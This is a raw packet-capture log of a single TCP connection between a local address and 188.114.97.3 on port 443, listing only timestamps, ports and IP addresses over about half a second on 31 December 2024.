Dec 31, 2024 08:57:13.508101940 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.508325100 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.508424044 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.514729977 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.514812946 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.514863014 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.514919043 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.524691105 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.524734974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.524775028 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.524780035 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.524831057 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.524831057 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.529088020 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.529160976 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.529189110 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.529196024 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.529231071 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.529288054 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.550749063 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.550797939 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.550889015 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.550894022 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.550921917 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.550940037 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.551055908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.551069021 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.551074028 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.551141024 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.551141024 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.551187992 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.551331043 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.551486969 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.551583052 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.551695108 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.551798105 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.551906109 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.551970959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.551991940 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.551995039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.552026033 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.552431107 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.552520990 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.552525997 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.552539110 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.552584887 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.552618027 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.552624941 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.552651882 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.552738905 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.554300070 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.554440022 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.554492950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.554527998 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.554569960 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.554569960 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.554575920 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587269068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587308884 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587342024 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.587352037 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587388039 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.587409019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587547064 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587593079 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.587598085 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587649107 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.587718010 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587837934 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.587841988 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587863922 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.587985992 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.587990999 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.588046074 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.588213921 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.588551998 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.588557959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.594554901 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.594578981 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.594733953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.594737053 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.594744921 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.594790936 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.594815016 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.594818115 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.594851971 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.595011950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.595081091 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.595081091 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.595086098 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.601490974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.601650953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.601663113 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.601797104 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.601926088 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.601932049 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.615854979 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.615981102 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.615983009 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.615992069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.616074085 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.616255045 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.616383076 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.637548923 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.637690067 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.637691975 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.637705088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.637804031 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.637826920 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.637831926 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.637947083 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.638003111 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.638206959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.638273954 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.638278961 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.638313055 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.638367891 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.638422966 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.638521910 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.638525963 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.638530970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.638626099 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.638643980 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.638648987 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.638801098 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.638917923 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.638984919 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.638992071 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.639143944 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.639386892 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.639417887 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.639424086 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.639451027 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.641146898 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.641271114 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.641275883 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.642379045 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.642472982 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.642482042 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.673945904 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674024105 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.674030066 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674122095 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674209118 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.674220085 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674278021 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674381971 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.674386978 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674515009 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674578905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674587965 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674613953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.674618006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674665928 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.674760103 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.674828053 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.674834967 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.681356907 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.681437016 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.681468010 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.681473970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.681510925 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.681545019 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.702688932 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.702727079 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.702774048 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.702778101 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.702882051 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.703001022 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.703006029 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.703073025 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.703094959 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.703099966 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.703135014 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.703210115 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.724467993 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.724603891 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.724628925 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.724711895 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.724734068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.724807978 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.725255013 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.725270987 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.725370884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.725375891 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.725471973 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.725684881 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.725723982 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.725728989 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.725791931 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.725795984 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.725801945 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.727792025 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.727885962 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.727890968 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.728071928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.728137016 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.728163958 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.728171110 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.728212118 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.760740995 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.760848999 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.760854959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.760864019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.760924101 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.760935068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.761008978 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.761082888 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.761099100 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.761112928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.761151075 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.761562109 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.761596918 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.761631012 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.761636019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.761645079 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.761674881 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.761703014 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.768276930 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.768402100 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.768414021 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.768418074 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.768488884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.768492937 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.789428949 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.789556980 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.789587021 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.789592981 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.789705992 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.789736032 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.789845943 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.789880037 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.789880991 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.789887905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.789911985 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.790127993 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.811223030 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.811311007 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.811414003 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.811585903 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.811620951 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.811625957 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.811651945 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.811800957 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.811975956 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.812015057 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.812020063 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.812083006 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.812115908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.812160015 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.812163115 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.812202930 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.812235117 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.812282085 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.812284946 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.812489986 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.812535048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.812578917 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.812587023 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.812594891 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.812737942 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.814707994 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.814868927 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.814944983 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.814949989 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.815004110 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.863111019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.863260031 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.863266945 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.863333941 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.863491058 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.863496065 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.863537073 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.863573074 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.863576889 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.863612890 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.863765955 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.863886118 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.863940954 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.863946915 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.864012957 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.864058018 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.864084959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.864124060 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.864129066 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.864170074 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.864260912 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.864315987 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.864324093 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.864558935 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.864625931 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.864633083 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.881414890 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.881484032 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.881490946 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.881494999 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.881556988 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.881561995 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.881602049 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.881653070 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.881706953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.897964001 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.898097992 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.898123026 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.898211002 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.898363113 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.898426056 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.898710012 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.898818016 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.898857117 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.898910046 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.898952007 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.898956060 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.899033070 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.901448011 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.901462078 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.901530027 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.901534081 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.901937962 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.901974916 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.902031898 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.902031898 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.902036905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.902349949 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.950318098 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.950339079 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.950433016 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.950433016 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.950440884 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.950905085 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.950922966 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.950959921 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.950959921 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.950965881 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.951021910 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.951021910 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.951423883 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.951437950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.951483011 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.951488972 CET	443	49735	188.114.97.3	192.168.2.4
